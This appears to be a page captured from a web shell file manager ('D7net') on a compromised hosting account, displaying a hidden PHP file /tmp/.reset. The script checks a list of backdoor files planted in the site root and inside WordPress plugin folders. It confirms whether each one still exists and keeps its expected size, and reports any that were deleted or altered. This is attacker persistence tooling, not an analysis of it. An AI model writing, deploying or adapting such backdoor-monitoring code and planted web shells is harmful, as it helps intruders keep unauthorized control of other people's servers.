D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
tmp
/
Filename :
.reset
back
Copy
<?php $r = '/home/qualakwq/grabnewlook.com'; $x = ["/540189.php"=>"bd@@229958234@@1203", "/dn.php"=>"bd@@224073325@@1126", "/cloud.php"=>"bd@@229958236@@1125", "/File_dm.php"=>"bd@@229958237@@1159", "/fine.php"=>"bd@@229958238@@960", "/health.php"=>"bd@@229958239@@699", "/wp-content/plugins/slider_1763966759/wf-flyout/home_1763966771.php"=>"bd@@223990141@@953", "/wp-content/plugins/convertpro/assets/css/cloud.php"=>"bd@@180368838@@602"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');